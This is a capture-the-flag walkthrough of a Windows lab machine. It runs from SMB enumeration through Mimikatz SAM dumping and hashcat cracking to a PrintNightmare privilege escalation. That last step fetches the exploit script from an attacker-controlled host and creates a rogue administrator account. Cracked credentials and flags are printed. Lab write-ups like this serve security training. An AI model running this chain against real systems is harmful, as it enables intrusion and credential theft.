Overview¶
Walkthrough¶
Recon¶
nmap¶
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Enumerating SMB Shares¶
OldBoxes/bastian → smbclient -L \\\\10.10.10.134 -U 'anonymouse' -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
bastian/dump → smbclient \\\\10.10.10.134\\backups -U 'anonymouse' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> timeout 1000000
io_timeout per operation is now 1000000
smb: \> mget *
Enumerating Win Hard Disk¶
Run Mimikatz inside VHD to found the user L4mpje
NTLM hash: 26112010952d963c8dc4217daec986d9
mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : L4mpje
Hash NTLM: 26112010952d963c8dc4217daec986d9
Then crack it using hashcat
Ξ bastian/dump → hashcat -a 0 -m 1000 l4mpje-ntlm /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
....
26112010952d963c8dc4217daec986d9:bureaulampje
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9
Then login into SSH
bastian/dump → ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt
9bfe57d5c3309db3a151772f9d86c6cd
Privilege Escalation¶
PrintNightmare (CVE 2021-1675)¶
PS C:\Users\L4mpje\Videos> Invoke-WebRequest "http://10.10.14.27:9001/CVE-2021-1675.ps1"
PS C:\Users\L4mpje\Videos> . .\CVE-2021-1675.ps1
PS C:\Users\L4mpje\Videos> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_1734185bdb8f8610\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll
PS C:\Users\L4mpje\Videos> net users
User accounts for \\BASTION
-------------------------------------------------------------------------------
adm1n Administrator DefaultAccount
Guest L4mpje
The command completed successfully.
bastian/dump → ssh adm1n@10.10.10.134
adm1n@10.10.10.134's password:
dPermission denied, please try again.
adm1n@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
adm1n@BASTION C:\Users\Administrator\Desktop>more root.txt
958850b91811676ed6620a9c430e65c8